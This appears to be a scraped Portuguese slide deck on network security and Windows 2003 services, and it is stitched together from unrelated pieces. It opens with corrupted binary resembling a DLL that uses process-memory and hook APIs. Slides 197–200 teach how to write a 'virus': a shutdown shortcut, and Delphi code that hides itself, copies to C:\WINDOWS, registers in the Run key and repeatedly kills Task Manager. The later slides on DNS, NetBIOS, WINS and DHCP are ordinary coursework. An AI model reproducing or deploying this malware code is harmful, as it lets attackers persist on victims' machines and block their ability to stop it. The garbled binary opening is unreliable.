@ÿuÿuÿuÿuPÿuè×ûÿÿ‰Eìëÿuÿuÿuÿuÿu ÿuè»ûÿÿ‰Eì_^‹EìÉ U‰åƒì VWÿuÿuÿu ÿuèþÿÿ‰Eôƒø |vƒ}upÇEø ‹} ‹WD; @ u¡ @ ÿ7‰þ7¹ð üó¤Xë݉þ7VEü9þu‹Eø Àt‹GD; @ u ‹uøÇ ë‰}ø‹}ü‹GD; @ u‹uø‹ë½_^‹EôÉ U‰åƒìVWh‚ @ ÿ‚0@ ‰EühD @ ÿ–0@ ‰Á¾D @ ‰÷¬4jªâúhi @ ÿ–0@ ‰Á¾i @ ‰÷¬4jªâúh @ ÿ–0@ ‰Á¾ @ ‰÷¬4jªâúhi @ ÿuüÿ†0@ £S @ EøPjhW @ ÿ5S @ jÿÿ~0@ Æ_ @ hÇ` @ /%@ Æd @ ÍEøPjh_ @ ÿ5S @ jÿÿz0@ h @ ÿuüÿ†0@ £ @ EøPjh @ ÿ5 @ jÿÿ~0@ Æ @ hÇ @ Ì#@ Æ @ ÍEøPjh @ ÿ5 @ jÿÿz0@ hD @ ÿuüÿ†0@ £. @ EøPjh2 @ ÿ5. @ jÿÿ~0@ Æ: @ hÇ; @ È!@ Æ? @ ÍEøPjh: @ ÿ5. @ jÿÿz0@ _^ÉÃU‰åÿuÿu ÿuj ÿ.1@ 1ÀÉ U‰åƒìEüPjhW @ ÿ5S @ jÿÿz0@ EüPjh @ ÿ5 @ jÿÿz0@ EüPjh2 @ ÿ5. @ jÿÿz0@ ÉÃU‰åj ÿ5 @ hN'@ jÿ*1@ jÿÿŽ0@ É U‰åVS‹ud¡0 ‹@ ƒÀ ‹ ;puù‹0‹X‰3‹p‹‰s@‹0‹X‰3‹p‹‰s[^É U‰åƒìVW‹u ¿@ f*f Àtf«ëõf«Ç@ ‹E£ @ EüPj j h»'@ j j ÿŠ0@ _^É V0 <0 z0 1 J0 *1 KERNEL32.DLL USER32.DLL ž0 ´0 È0 Ü0 î0 þ0 1 1 ž0 ´0 È0 Ü0 î0 þ0 1 1 WriteProcessMemory ReadProcessMemory GetModuleHandleA GetProcAddress CreateThread Sleep lstrlenW lstrlenA 61 J1 61 J1 SetWindowsHookExA CallNextHookEx 2@ (@ ,@ 0@ !( >@ SYSHOST.DLL A £0*0·0ì0ò0ú0ÿ01 111.191?1G1a1g1o1t1z11†1‹1£1®1´1¼172=2d2”2·2½2á 2A3k3q3y3~3„3‰33•3§3²3¸3À3;4A4h4˜4»4Á4å4e5l5›5·5Ø 5Þ5æ5ì5ó5 66 66 6'646=6B6M6S6[6a6h6l6r6~6„6OE6‘6š6Ÿ6ª6°6¸6¾6Å6É6Ï6Û6á6é6î6÷6ü67 777"7&7,787>7F7^7u7{7ƒ7Ž7”7oe7§7*7μ7Â7Ç7Ï7×7-8@8L8Y8c8
    197. 197. Código de Vírus (cont) ¨ virus.bat Criem um atalho e na localização escrevam " shutdown -s -t 60 -c " qualquer coisa que queiram dizer, mas tem de ser entre aspas" T (TEMPO EM SEGUNDOS) Podem mudar C (Comentário) 197
    198. 198. Virus em Delphi ¨ Existe muitas maneiras de criar um virus em delphi, a maioria dos trojans famosos que circulão n internet foram feitos em delphi. Eu vou mostrar como fazer um virus reninciar junto com o windows e travar o Ctrl + Alt + Del. ¨ Vamos la, Primeiro abra um projeto e coloque na uses "Registry," ¨ Agora em baixo de "{$R *.dfm}" coloque isso: 198
    199. 199. procedure RunOnStartup(sProgTitle,sCmdLine: string; bRunOnce: boolean ); var sKey : string; reg : TRegIniFile; begin if( bRunOnce )then begin sKey := 'Once' end else begin sKey := ''; end; reg := TRegIniFile.Create( '' ); reg.RootKey := HKEY_LOCAL_MACHINE; reg.WriteString('SoftwareMicrosoft' + 'WindowsCurrentVersionRun'+ sKey + #0, sProgTitle, sCmdLine ); reg.Free; end; Agora no FormCreate coloque isso: procedure TForm1.FormCreate(Sender: TObject); begin Application.ShowMainForm := False; CopyFile(PChar(Application.ExeName),'C:WINDOWSvirus.exe',True); RunOnStartup('virus','C:WINDOWSvirus.exe',true); end; 199
    200. 200. ¨ Agora vamos fazer a par te de travar a listagem de processos, vou dar o coder todo basta voce fazer sua ar te: unit Unit1; interface uses Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, Dialogs, TLHelp32, PsAPI, ExtCtrls; type TForm1 = class(TForm) Timer1: TTimer; procedure Timer1Timer(Sender: TObject); procedure FormCreate(Sender: TObject); private { Private declarations } public { Public declarations } end; var Form1: TForm1; implementation {$R *.dfm} function TerminarProcesso(sFile: String): Boolean; var verSystem: TOSVersionInfo; hdlSnap,hdlProcess: THandle; bPath,bLoop: Bool; peEntry: TProcessEntry32; arrPid: Array [0..1023] of DWORD; iC: DWord; k,iCount: Integer; arrModul: Array [0..299] of Char; hdlModul: HMODULE; begin Result := False; if ExtractFileName(sFile)=sFile then bPath:=false else bPath:=true; verSystem.dwOSVersionInfoSize:=SizeOf(TOSVersionInfo); GetVersionEx(verSystem); if verSystem.dwPlatformId=VER_PLATFORM_WIN32_WINDOWS then begin hdlSnap:=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); peEntry.dwSize:=Sizeof(peEntry); bLoop:=Process32First(hdlSnap,peEntry); while integer(bLoop)<>0 do begin if bPath then begin if CompareText(peEntry.szExeFile,sFile) = 0 then begin TerminateProcess(OpenProcess(PROCESS_TERMINATE,false,peEntr y.th32ProcessID), 0); Result := True; end; end else begin if CompareText(ExtractFileName(peEntry.szExeFile),sFile) = 0 then begin TerminateProcess(OpenProcess(PROCESS_TERMINATE,false,peEntr y.th32ProcessID), 0); Result := True; end; end; 200 bLoop := Process32Next(hdlSnap,peEntry); end; CloseHandle(hdlSnap); end else if verSystem.dwPlatformId=VER_PLATFORM_WIN32_NT then begin EnumProcesses(@arrPid,SizeOf(arrPid),iC); iCount := iC div SizeOf(DWORD); for k := 0 to Pred(iCount) do begin hdlProcess:=OpenProcess(PROCESS_QUERY_INFORMATION or PROCESS_VM_READ,false,arrPid [k]); if (hdlProcess<>0) then begin EnumProcessModules(hdlProcess,@hdlModul,SizeOf(hdlModul),iC); GetModuleFilenameEx(hdlProcess,hdlModul,arrModul,SizeOf(arrModul) ); if bPath then begin if CompareText(arrModul,sFile) = 0 then begin TerminateProcess(OpenProcess(PROCESS_TERMINATE or PROCESS_QUERY_INFORMATION,False,arrPid [k]), 0); Result := True; end; end else begin if CompareText(ExtractFileName(arrModul),sFile) = 0 then begin TerminateProcess(OpenProcess(PROCESS_TERMINATE or PROCESS_QUERY_INFORMATION,False,arrPid [k]), 0); Result := True; end; end; CloseHandle(hdlProcess); end; end; end; end; procedure TForm1.Timer1Timer(Sender: TObject); begin TerminarProcesso('taskmgr.exe'); end; procedure TForm1.FormCreate(Sender: TObject); begin application.ShowMainForm := false; end; end.
    201. 201. A Dor do “Blaster” ¨ Duas linhas de código C no RPCSS: – while (*pwszTemp != L'') *pwszServerName++ = *pwszTemp++; ¨ Levaram a – >15 milhões de computadores infectados – 3.3M de chamados de suporte em Set. 2003 (volume normal relacionado a vírus é de 350,000) – Muita repercussão negativa • “Isto aumentará o nível de frustração ao ponto que várias organizações irão contemplar seriamente alternativas à Microsoft” Gartner Group • “É realmente recomendado ter cautela aqui. Os esforços [de segurança da Microsoft] foram sinceros, mas não estou certo se foram sinceros o suficiente.” Forrester Research
    202. 202. Em que abordagem você confia ? Segurança como uma opção Segurança como um aditivo Integração extremamente complicada Não é economicamente viável Não pode focar na principal prioridade Segurança como parte do sistema Segurança Embutida na Rede Colaboração inteligente entre os elementos Visão de sistemas Foco direto na principal prioridade
    203. 203. JOGO DOS ERROS EDUCAÇÃO DO USUÁRIO É ESSENCIAL
    204. 204. 204 PPrrááttiiccaa ddee SSeegguurraannççaa xx
    205. 205. Windows 2003 Server 205
    206. 206. Instalação 206
    207. 207. Instalação 207
    208. 208. Instalação 208
    209. 209. Instalação 209
    210. 210. Instalação 2003 210
    211. 211. Introdução a Serviços 211
    212. 212. DNS 212
    213. 213. DNS - Domain Name Service ¨Padrão Aberto para Resolução de Nomes Hierárquicos – Agrupa nomes em domínios. – A árvore de nomes é armazenada num banco ddee ddaaddooss ddiissttrriibbuuííddoo. ¨Especificações do DNS – RFCs 1033, 1034, 1034, 1101, 1123, 1183 e 1536. • Expecificações da Internet Task Force – Berkeley Internet Name Domain (BIND) • Implementação desenvolvida na Berkley University para a versão 4.3 SD Unix
    214. 214. Serviço DNS Nome? Nome? Serviço DNS um ou mais servidores armazenam um banco de dados distribuídos IP IPB Servidor DNS
    215. 215. Nome de Domínio ¨ Os nomes Hierárquicos utilizados pelo DNS são chamados FQDN: – Fully Qualified Domain Name ¨ Exemplo: – www.pucpr.br – www: nome do host – pucpr: nome de domínio – br: nome de domínio ¨ Nome de domínio: – Coleção de HOSTS ou de outros domínios.
    216. 216. Árvore de nomes br pucpr www ufpr ppgia br Pucpr www Ufpr ppgia www FOLHA RAIZ www
    217. 217. Banco de Dados Distribuídos ¨ No serviço DNS, os nomes estão armazenados em ZONAS. Zonas são arquivos textos que contém os nomes de um ou mais domínios. br pucpr www ufpr www RAIZ www ppgia ZONA .br ZONA pucpr.br ZONA ufpr.br
    218. 218. Banco de Dados Distribuídos ¨ Cada Zona pode ser armazenada num servidor DNS distinto. br pucpr www ufpr www RAIZ servidor dns.br www ppgia ZONA .br ZONA pucpr.br ZONA ufpr.br servidor dns.pucpr.br servidor dns.ufpr.br
    219. 219. Exemplo de arquivo de Zona ZONA pucpr.br ¨ @ SOA dns.pucpr.br ¨ @ NS dns.pucpr.br ¨ dns.pucpr.br. A 200.17.99.2 ¨ www A 200.17.99.2 ¨ www.ppgia A 200.17.98.174 SOA: START OF AUTHORITY NS: NAME SERVER A: HOST • SOA indica qual o servidor armazena o arquivo de zona • NS indica qual o servidor que responde pelo domínio. • Nomes terminados por “.” são absolutos
    220. 220. Exemplos de arquivo de Zona • @ SOA dns.br • @ NS dns.br • pucpr NS www dns.ufpr.br • ufpr NS dns.pucpr.br • dns.pucpr A 200.17.99.2 • dns.ufpr A 200.101.0.12 ¨ @ SOA dns.ufpr.br ¨ @ NS dns.ufpr.br ¨ dns.ufpr.br. A 200.101.0.12 ¨ www A 200.101.0.15 ZONA ufpr.br ZONA.br • @ SOA dns.pucpr.br • @ NS dns.pucpr.br • dns.pucpr.br. A 200.17.99.2 • www A 200.17.99.2 • www.ppgia A 200.17.98.174 ZONA pucpr.br
    221. 221. Tipos de Registros no DNS ¨ A: Host Adress – associa um nome a um endereço IP: nnoommee Þ IIPP.. ¨ PTR: Point Resource Record – associa um endereço IP a um nome: IIPP Þ nnoommee.. ¨ NS: Name Server – identifica o servidor DNS no domínio. ¨ SOA: Start of Authority – indica que o servidor de DNS é a autoridade para fornecer informações no domínio (aauutthhoorriittaattiivvee).
    222. 222. Consulta Reversa ¨ O cliente fornece um número IP e requisita o nome correspondente. ¨ Os registros que relacionam IPs aos nomes são do tipo PTR. – Por exemplo, um registro para o endereço IP 10.17.98.31 corresponde a uma entrada DNS no seguinte formato: • 31.98.17.10.in-addr.arpa ¨ Se o endereço IP não estiver contido no domínio local (aquele controlado pelo servidor DNS consultado), o servidor DNS contata o servidor DNS situado num nó superior da árvore. – Este mecanismo de procura seqüencial consultando os nós superiores é chamado “walking the tree”.
    223. 223. Forwarder ¨ Cada servidor DNS possui um arquivo de configuração que diz: – Lista de zonas que ele armazena – Lista de servidores forwarders ¨ Lista de zonas – Indica a localização física do arquivo correpondente a cada ZONA. ¨ Lista de forwarders – Um forwarder é um servidor DNS hierarquicamente superior ao servidor corrente. – Esse servidor recebe as consultas de domínios não armazenados pelo servidor DNS.
    224. 224. Exemplo Arquivo de configuração do servidor dns.pucpr.br forwarders { 200.17.99.2 } pucpr.br { /etc/pucprbr.dns } forwarders { primeiro forwarder segundo forwarder etc. } zona { localização } zona { localização }
    225. 225. Ponteiros NS e Forwarders FORWARDER FORWARDER br NS NS ZONA pucpr.br ZONA ufpr.br pucpr www ufpr www ZONA .br RAIZ www ppgia
    226. 226. Consulta Recursiva ¨ Graças ao ponteiros NS e FORWARDER qualquer servidor DNS pode responder por toda a árvore de domínios. ¨ A resposta pode ser: – O mapeamento nome-IP requisitado – Uma mensagem de erro dizendo que o domínio ou host não foi encontrado. ..bbrr ppuuccpprr uuffpprr aa bb cc dd RESPOSTA AUTORITÁRIA a.pucpr.br? IP = 10.17.98.31 d.ufpr.br IP = 200.17.98.174 1 RESPOSTA NÃO AUTORITÁRIA SE VIER DA CACHE 2 3 4 5 6 1 2
    227. 227. DNS e a Internet ¨ O “root” da árvore de nomes da Internet é gerenciado pelo Internet Network Information Center (IInntteerrNNIICC) ¨ InterNIC é o nome dado a um projeto criado num acordo entre a National Science Foundation (NSF) e a Network Solutions, Inc. – Provê um serviço de registro de nomes para os domínios .com, .net, .org, and .edu; – O site do InterNIC é http://www.internic.net ¨ O InterNIC delega a responsabilidade de administrar partes do domínio de nomes para as empresas e organizações conectadas na Internet.
    228. 228. Domínios Gerenciados pelo InterNIC ¨ Segundo a nomenclatura adotada na Internet, o “Domain Name Space“ é dividido em três áreas principais: – Organization Domains: • 3 caracteres para indicar a atividade da empresa. – .com, .edu, .gov, .int, .mil, .net, .org – .int: organizações internacionais – .mil: organizações militares – .org: organizações não comerciais – Geographical Domains: • 2 caracteres para identificar o país. – .br, .fr, .jp, etc. – Reverse domain: • domínio especial utilizado para associar endereços IP aos nomes.
    229. 229. Exemplo Gerido pelo InterNIC .com .org .edu .pucpr www ppgia rla01 Fully qualified domain name (FQDN) www.pucpr.br .br Gerido pela .com FAPESP Gerido pela PUC
    230. 230. Zonas Servidor DNS do Internic .com .org .edu .pucpr www ppgia rla01 .br Servidor DNS da .com FAPESP Servidor DNS da PUC REGISTRO NS
    231. 231. Tipos de Servidores ¨ PPrriimmáárriioo – É o servidor autoritário para zona. A inclusão, alterações ou exclusão dos registros da zona são feitas através deste servidor. – O servidor primário envia uma cópia dos seus arquivos de dados para o servidor secundário através de um processo denominado ““zzoonnee ttrraannssffeerr”” ¨ SSeeccuunnddáárriioo – Funciona como backup. Apenas lê os arquivos de dados do servidor primário, e responde as requisições dos clientes quando requisitado. ¨ CCaacchhiinngg--OOnnllyy – São servidores DNS que apenas efetuam consultas e guardam o resultado numa cache e retornam os resultados. – Um servidor DNS realiza consulta a outros servidores sempre que tiver que localizar um nome externo as zonas que controla.
    232. 232. DNS - Resumo ¨ Vantagens: – Implementa um mecanismo de nomes hierárquico. • Isto facilita a organização dos nomes em redes de grande porte. – O banco de dados que armazena os nomes é distribuído. • Cada servidor DNS contém informações de zonas específicas, e pode ser administrado separadamente. – É o mecanismo de nomes adotado na Internet. • Pode ser utilizado para resolver nomes na rede local (intranet) e na rede Internet. ¨ Desvantagem: – Não é dinâmico. • É responsabilidade do administrador manter as entradas do arquivo de nomes atualizada.
    233. 233. Netbios 233
    234. 234. Nomes NetBIOS ¨ O espaço de nomes NetBIOS é “flat” – flat = não segmentado – implica que cada nome NetBIOS na rede deve ser único ¨ Os recursos na rede são identificados por nomes NetBIOS registrados dinâmicamente quando: – o computador é inicializado – serviços são inicializados – usuário se loga. ¨ Nomes NetBIOS tem 16 caracteres de comprimento. – O usuário atribui os 15 primeiros caracteres. – O último caracter é reservado para indentificar o tipo de recursos.
    235. 235. Nomes Registrados na Estação ¨ C:>nbtstat -n ¨ Endeço-Ip nó: [200.17.98.217] Identificador de escopo: [] ¨ Tabela de nomes locais de NetBIOS ¨ Nome Tipo Status ¨ ------------------------------------------------------------------------ ¨ PPGIA16 <00> UNIQUE Registrado ¨ PPGIA16 <20> UNIQUE Registrado ¨ MESTRADO <00> GROUP Registrado ¨ PPGIA16 <03> UNIQUE Registrado ¨ MESTRADO <1E> GROUP Registrado ¨ JAMHOUR <03> UNIQUE Registrado
    236. 236. Nomes NetBIOS ¨ Podem ser de dois tipos: – UNIQUE (one owner) • Referenciam um único recurso na rede • Exemplo: uma estação – GROUP (multiple owner) • Referenciam um conjunto de recursos na rede • Exemplo: nome de domínio, nome de grupo ¨ Alguns exemplos de tipos para identificadores únicos são: – <00> Nome do Computador e do Domíno (ou grupo) – <03> Usuário logado – <20> Serviço de nomes de servidor para sincronização de arquivos compartilhados
    237. 237. Registro e Resolução de Nomes NetBIOS ¨ Os seguintes mecanismos são utilizados para localizar recursos NetBIOS – NetBIOS name cache – NetBIOS name server - WINS server – IP subnet broadcast – Static LMHOSTS files – Static HOSTS files – DNS servers ¨ Os mecanismos de resolução de nomes do NetBIOS sobre TCP/IP são definidos pelas RFCs 1001 e 1002 – de acordo com a estratégia utilizada para resolver nomes, os computadores são denominados b-node, p-nome, m-node ou h-node.
    238. 238. Resolução de Nomes por BroadCast ¨ Resolução de nomes usado broadcast IP fornece um método dinânico para resolução de endereços. – Datagrama “NetBIOS Name Query” em broadcast perguntando o nome correspondente ao endereço. – Endereço MAC: FF-FF-FF-FF-FF-FF – Endereço IP: 255.255.255.255 ¨ Problemas: – Aumento do tráfego na rede – Não funciona em redes segmentadas por rotedores • Os recursos localizados em outras redes não recebem os pedidos de broadcast pois, por default, o roteador bloqueia os pacotes recebidos em broadcast.
    239. 239. Extranets = VPN (Virtual Private Networks) NOMES NETBIOS NOMES NETBIOS ACME IAPO1 IAPO2 LAB0101 PPGIA RREEDDEE AA RREEDDEE BB BROADCAST BROADCAST
    240. 240. Cache com Nomes NetBIOS ¨ Cada estação mantém uma tabela com os nomes NetBIOS mais usados recentemente. ¨ C:>nbtstat -c ¨ Endereço-Ip nó: [200.17.98.217] Identificador de escopo: [] ¨ Tabela de nomes de caches remotas de NetBIOS ¨ Nome Tipo Endereço Host Duração [seg] ¨ --------------------------------------------------------------- ¨ PPGIA07 <00> UNIQUE 200.17.98.224 20 ¨ PPGIA07 <20> UNIQUE 200.17.98.224 600 ¨ HAL2001 <00> UNIQUE 10.17.98.31 660
    241. 241. Usando o Arquivo HOSTS ¨ O arquivo “hosts” permite relacionar nomes a IP’s, evitando a resolução por broadcast. – A diretiva #PRE pode ser utilizada para registrar entradas diretamente na cache. – Neste caso, as entradas são consultadas antes de qualquer outro mecanismo de resolução: ¨ Exemplos: • 10.17.98.31 hal2001 #pre #coloca a entrada na cache • 10.17.08.30 PPGIA16 #não coloca na cache ¨ Existe também uma diretiva especial para definir domínios: • 10.17.98.42 server1 #pre #DOM:ELETRICA.RIEP
    242. 242. SERVIDORES DE NOMES NETBIOS ¨ MECANISMO DE RESOLUÇÃO DE NOMES NETBIOS SEM BROADCAST – Mantém uma tabela que mapeia os endereços IP com o nome dos computadores. – A tabela é atualizada ddiinnaammiiccaammeennttee toda a vez que uma máquina recebe um novo endereço IP. ¨ Exemplo: WINS: Windows Internet Name Service ¨ O serviço WINS trabalha numa arquitetura cliente-servidor. – WINS Server: • manipula todos as consultas de nomes. – WINS Client: • registra seu nome e endereço no servidor WINS. • envia as requisições de nomes para o WINS server.
    243. 243. WINS NÃO USA BROADCAST ACME IAPO1 IAPO2 LAB0101 PPGIA RREEDDEE AA RREEDDEE BB WINS SERVER IP e NOME são fornecidos na inicialização TABELA DINÂMICA REQUEST REPLY
    244. 244. Características do WINS ¨ Ao contrário da resolução de nomes por broadcast, WINS permite que os nomes sejam resolvidos de maneira transparente através de roteadores. WINS enabled replicação WINS proxy WINS server roteador LINK DE BAIXA WINS server CAPACIDADE Non- WINS enabled
    245. 245. Definições ¨ WINS Server – Computador que executa o serviço Windows Internet Name • Este computador mantem uma base de dados relacionando os nomes e os endereços IP das estações na rede. – Pode haver mais de um servidor WINS na rede. ¨ Cliente WINS enabled – Estação configurada para resolver nomes pelo WINS. ¨ Cliente Non-WINS enabled – Estação não configurada ou incompatível com o serviço WINS. ¨ WINS proxy – Estações que acessam o serviço WINS para os clientes Non-WINS enable.
    246. 246. Múltiplos Servidores WINS ¨ A utilização de múltiplos servidores WINS é aconselhável pois: – permite distribuir a carga de resolução de nomes • as consultas de nomes feita pelos clientes são ponto-a- ponto. • O mecanismo de broadcast só é utilizado quando o nome solicitado não é encontrado na base do servidor WINS. – diminui a possibilidade de interrupção do serviço de nomes • cada servidor WINS possui uma cópia completa da base de nomes, funcionando como backup dos demais. • quando um servidor entra em pane, os clientes passam a consultar automaticamente o outro servidor.
    247. 247. WINS NÃO É APROPRIADO PARA INTERNET WINS SERVER WINS SERVER REPLICAÇÃO WINS SERVER WINS SERVER ¨ Para redes grandes, o WINS é inviável pois: – O número de replicações é muito grande – Cada servidor WINS guarda uma cópia completa de todos os nomes.
    248. 248. Ciclo de Vida dos Nomes NetBIOS ¨ Os nomes NetBIOS são concedidos por empréstimo. Precisam ser renovados periodicamente para que o computador mantenha o nome. Active (Ativo) Released (Liberado) Elimando O cliente foi desligado Ou o nome foi liberado explicitamente O prazo de renovação foi esgotado (6 dias) Não renovado (x dias) OUTRO COMPUTADOR PODE SOLICITAR O DIREITO DE USAR O NOME
    249. 249. Resolução de Nomes ¨ Os mecanismos de resolução de nomes do NetBIOS sobre TCP/IP são definidos pelas RFCs 1001 e 1002. – b-node: (broadcast-node) resolvem nomes por broadcast de IP – p-node: (point-to-point-node) usam um servidor de nomes NetBIOS – m-node: (mix -node) se b-node falhar tentam p-node. – h-node: (hybrid-node) se p-node falhar tentam b-node
    250. 250. WINS - Resumo ¨ Vantagens: – Reduz significativamente o número de broadcasts de endereços IP necessários para localizar recursos locais e remotos. – Permite que clientes resolvam nomes de estações situados em segmentos remotos isolados por roteadores. – Reduz a necessidade de manter e atualizar os arquivos LMHOSTS. ¨ Desvantagens: – Não implementa um mecanismo de nomes hierárquico. Isto dificulta a administração de redes de grande porte. – O banco de dados que armazena os nomes NetBIOS não é distribuído. Cada servidor WINS constitui uma réplica completa do banco de dados de nomes. – Não é compatível com o serviço de nomes usado na Internet.
    251. 251. DHCP 251
    252. 252. DHCP ¨Dynamic Host Configuration Protocol – Padrão Industrial Aberto • IETF RFC 1533, 1534, 1541 e 1542. – IETF: Internet Engineering Task Force – RFC: Request for Comments – Utilizado para centralizar a administração e configuração de parâmetros TCP/IP numa rede. – Elimina a necessidade de configurar manualmente os clientes numa rede TCP/IP.
    253. 253. DHCP - Arquitetura Cliente- Servidor ¨ Um computador da rede deve funcionar como servidor DHCP. REQUEST REPLY CLIENTES DHCP SERVIDOR DHCP
    254. 254. Administração de Endereços IP ¨ Cada computador numa rede TCP/IP deve ter um endereço IP único. – O endereço IP identifica a estação e a rede ao qual a estação pertence. – Quando o computador é movido para outra rede, seu endereço IP deve refletir esta mudança. ¨ DHCP especifica os seguintes serviços (RFC 1541): – um protocolo para que o servidor DHCP e seus clientes se comuniquem. • PROTOCOLO BOOTP – Um método para configura os parâmetros de rede de um host IP: • IP, máscara, gateway default, servidores de nomes, etc.
    255. 255. ESCOPO DHCP ¨ Quando se utiliza DHCP, cada rede local é caracterizada por um ESCOPO: PARTE FIXA MASCARA GATEWAY SERVIDOR DE NOMES OUTRAS ROTAS PERÍODO DE EMPRÉSTIMO PARTE DINÂMICA RANGE DE IP’S MESMO VALOR PARA TODOS OS HOSTS DO ESCOPO UM VALOR DIFERENTE PARA CADA HOST DO ESCOPO
    256. 256. Processo de Atribuição Cliente DHCP ESCOPO Servidor DHCP Dhcpdiscover Dhcpoffer 200.17.98.1 Dhcprequest 200.17.98.1 Dhcpack 200.17.98.1 ...... Dhcprelease 200.17.98.1 TTooddaass aass mmeennssaaggeennss ssããoo eennvviiaaddaass eemm bbrrooaaddccaasstt 255.255.255.0 200.17.98.23 72 horas 200.17.98.1 … 200.17.98.254
    257. 257. Processo de Atribuição ¨ 1) O cliente envia a mensagem DDhhccppddiissccoovveerr eemm bbrrooaaddccaasstt.. – O endereço IP de origem do pacote é 0.0.0.0 pois o cliente ainda não tem um endereço IP. ¨ 2) Quando o servidor recebe o pacote, ele seleciona um endereço IP disponível na sua lista e oferece ao cliente. – O servidor responde ao cliente com a mensagem Dhcpoffer ¨ 33)) QQuuaannddoo oo cclliieennttee rreecceebbee aa ooffeerrttaa eellee ppooddee:: – aceitar enviando a mensagem Dhcprequest (incluindo o IP) em broadcast – recusar enviando a mensagem Dhcpdecline em broadcast ¨ 44)) QQuuaannddoo oo sseerrvviiddoorr rreecceebbee oo DDhhccpprreeqquueesstt eellee ppooddee:: – confirmar para o cliente com a mensagem Dhcpack – recusar, se o endereço foi usado por outro, com a mensagem Dhcpnack ¨ 5) O cliente pode liberar um endereço com a mensagem Dhcprelease.
    258. 258. Observações ¨ 1) O cliente aceita a primeira oferta que receber. – Se houver mais de um servidor DHCP distribuindo endereços IP, não haverá como selecionar apenas um deles. ¨ 2) O direito do cliente de usar o endereço IP recebido pelo servidor DHCP é temporário. – Quando o prazo de validade do IP expira, o servidor pode atribuí-lo a outra estação na rede. – O cliente pode liberá-lo antecipadamente com a mensagem Dhcprelease
    259. 259. Observações ¨ 3) Se o cliente não receber a oferta do servidor: – Ele repete o pedido em intervalos de 2, 4, 8, 16 segundos. – Se as 4 tentativas fracassarem, ele tenta novamente em intervalos de 5 minutos. ¨ 4) Quando o cliente é reinicializado, ele tenta utilizar o mesmo IP que tinha anteriormente. – Ele envia o pacote Dhcprequest com o endereço IP antigo ao invés do Dhcpdiscover. – Se o pedido é negado, então o cliente envia um Dhcpdiscover.
    260. 260. Processo de Atribuição: Outras Vezes Cliente DHCP ESCOPO Servidor DHCP Dhcprequest 200.17.98.1 Dhcpack 200.17.98.1 TTooddaass aass mmeennssaaggeennss ssããoo eennvviiaaddaass eemm bbrrooaaddccaasstt 255.255.255.0 200.17.98.23 72 horas 200.17.98.1 … 200.17.98.254 OU Dhcpnack Dhcpdiscover …
    261. 261. Considerações sobre o Planejamento da Implementação do DHCP ¨ Para redes não segmentadas: – Um único servidor DHCP pode atender até 10000 clientes (estimativa). ¨ Para redes segmentadas: – Se os roteadores são compatíveis com a RFC1542 • Um único servidor DHCP é suficiente. – Se os roteadores não são compatíveis com a RFC1542 • Deve-se utilizar um servidor DHCP para cada rede. ¨ Computadores que se ligam temporariamente na rede (notebooks, por exemplo) devem receber IPs com tempo de “leasing” curto.
    262. 262. Posicionando Servidores DHCP Roteador RFC 1542 compatível Agente relay DHCP/BOO TP Servidor DHCP 1 Roteador não RFC 1542 compatível Servidor DHCP 2
    263. 263. Prática: DHCP ¨Instalar e configurar o DHCP; ¨Criar Escopo ¨Áreas de exclusões ¨Definir arquivos por MAC ADDRESS 263
    264. 264. Prática : Instalação DHCP 264
    265. 265. Prática: Instalação de Serviços ¨DNS ¨Terminal Service ¨Wins 265
    266. 266. Instalar Terminal Service 266
    267. 267. Prática : Instalando o IIS ¨Instalando e configurando ¨Disponibilizando um site ¨Configurando o DNS 267
    268. 268. Prática: IIS 268
    269. 269. Prática: IIS 269
    270. 270. Prática: Criação de Domínio ¨Instalar e configurar o dominio; ¨Criar usuários ¨Compartilhamento de arquivos ¨Definição de segurança com o GPO 270
    271. 271. Prática: Instalação DHCP 271
    272. 272. Prática: Criar Domínio ¨Iniciar / Executar / dcpromo 272
    273. 273. Prática: Criar Domínio 273

    ×